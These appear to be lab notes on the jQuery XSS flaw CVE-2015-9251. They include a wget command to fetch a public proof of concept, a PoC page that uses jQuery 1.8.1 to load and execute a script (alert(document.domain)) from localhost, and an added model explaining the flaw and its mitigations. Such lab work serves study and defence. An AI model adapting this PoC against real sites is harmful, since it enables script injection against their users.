jQuery before 3.0.0 is vulnerable to Cross-site Scripting (XSS) attacks when a cross-domain Ajax request is performed without the dataType option, causing text/javascript responses to be executed.
NOT COMPLETED
wget https://raw.githubusercontent.com/halkichi0308/CVE-2015-9251/master/CVE-2015-9251.html
Host it on the Apache web server on Kali Linux. It did not work using the Python HTTP server.
CVE-2015-9251.js
Payload to execute.
alert(document.domain);
CVE-2015-9251.html
<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  <!-- Vulnerable version (before 3.0.0). -->
  <script type="text/javascript" src="https://code.jquery.com/jquery-1.8.1.min.js"></script>
  <!--
  For comparison, a newer version (3.0.0 or later) that is not affected:
  <script type="text/javascript" src="https://code.jquery.com/jquery-3.3.1.min.js"></script>
  -->
</head>
<body>
  <p>CVE-2015-9251</p>
  <input type="button" id="btn" value="btn">
  <script>
    let btn = document.getElementById('btn');
    btn.addEventListener('click', () => {
      // $.get('cross origin resource'); // the same happens with $.get()
      // No dataType is given, so jQuery before 3.0.0 sniffs the Content-Type of the
      // response and executes a text/javascript body instead of passing it as text.
      $.ajax({
        url: "http://127.0.0.1/CVE-2015-9251.js",
        success: function(html) {
          console.log(html);
        }
      });
    });
  </script>
</body>
</html>
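To make the mechanism and the fixes concrete, here is an added example (not part of the PoC above and not jQuery's own code): a small model of how jQuery before 3.0.0 picks a response handler when dataType is omitted, beside the two hardening options (an explicit dataType, and the cross-domain prefilter that jQuery 3.0 enables by default). The helper names are hypothetical; the setting names they mirror (dataType, crossDomain, contents.script) are real jQuery Ajax settings.

```javascript
// Added example, not jQuery's code: a model of the CVE-2015-9251 decision path.
// Helper names are hypothetical; dataType, crossDomain and contents.script mirror
// real jQuery Ajax settings. jQuery derives crossDomain from the URL; the model
// takes it from the settings object to stay self-contained.

// Run registered prefilters on a copy of the request settings, the way
// $.ajaxPrefilter callbacks may edit settings before the request is sent.
function applyPrefilters(settings, prefilters) {
  const s = { crossDomain: false, ...settings };
  s.contents = { script: true, ...(settings.contents || {}) };
  for (const f of prefilters) f(s);
  return s;
}

// Decide what the old library does with a response body. With no dataType it
// sniffs the Content-Type header; a script-looking type with script conversion
// still enabled means the body is evaluated in the page (the vulnerable path).
function handleResponse(s, contentType, body) {
  const looksLikeScript = /\b(?:java|ecma)script\b/i.test(contentType);
  const sniffedScript = !s.dataType && looksLikeScript && s.contents.script !== false;
  if (s.dataType === "script" || sniffedScript) {
    return { action: "eval", body };   // response-controlled code would run
  }
  return { action: "text", body };     // handed to success() as a plain string
}

// Mitigation shipped in jQuery 3.0 and usable as a prefilter on older versions:
// a cross-domain response is never treated as script unless the caller asked.
const crossDomainScriptGuard = (s) => {
  if (s.crossDomain) { s.contents.script = false; }
};

function simulate(settings, prefilters, contentType, body) {
  return handleResponse(applyPrefilters(settings, prefilters), contentType, body);
}

// Constructed sample: the PoC's request and a text/javascript response body.
const poc = { url: "http://127.0.0.1/CVE-2015-9251.js", crossDomain: true };
const body = "alert(document.domain);";
const ct = "text/javascript";

const vulnerable   = simulate(poc, [], ct, body);                          // eval
const fixedByType  = simulate({ ...poc, dataType: "text" }, [], ct, body); // text
const fixedByGuard = simulate(poc, [crossDomainScriptGuard], ct, body);    // text
```

In a real page the guard is installed once with `$.ajaxPrefilter(crossDomainScriptGuard)` before any request is made, or the affected call sets `dataType: "text"` explicitly.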